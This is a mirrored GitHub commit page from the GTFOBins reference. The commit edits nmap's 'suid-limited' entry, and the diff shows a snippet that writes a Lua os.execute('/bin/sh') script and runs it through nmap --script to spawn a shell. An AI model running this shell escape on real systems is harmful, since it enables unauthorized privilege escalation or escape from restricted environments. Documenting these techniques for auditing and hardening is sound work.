mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 14:59:44 +01:00
Fix nmap suid-limited
This commit is contained in:
parent
8fb329ca92
commit
e84ec807a1
@ -86,6 +86,6 @@ functions:
|
|||||||
- description: Input echo is disabled.
|
- description: Input echo is disabled.
|
||||||
code: |
|
code: |
|
||||||
TF=$(mktemp)
|
TF=$(mktemp)
|
||||||
echo 'os.execute("/bin/sh -p")' > $TF
|
echo 'os.execute("/bin/sh")' > $TF
|
||||||
./nmap --script=$TF
|
./nmap --script=$TF
|
||||||
---
|
---
|
||||||
|
Loading…
Reference in New Issue
Block a user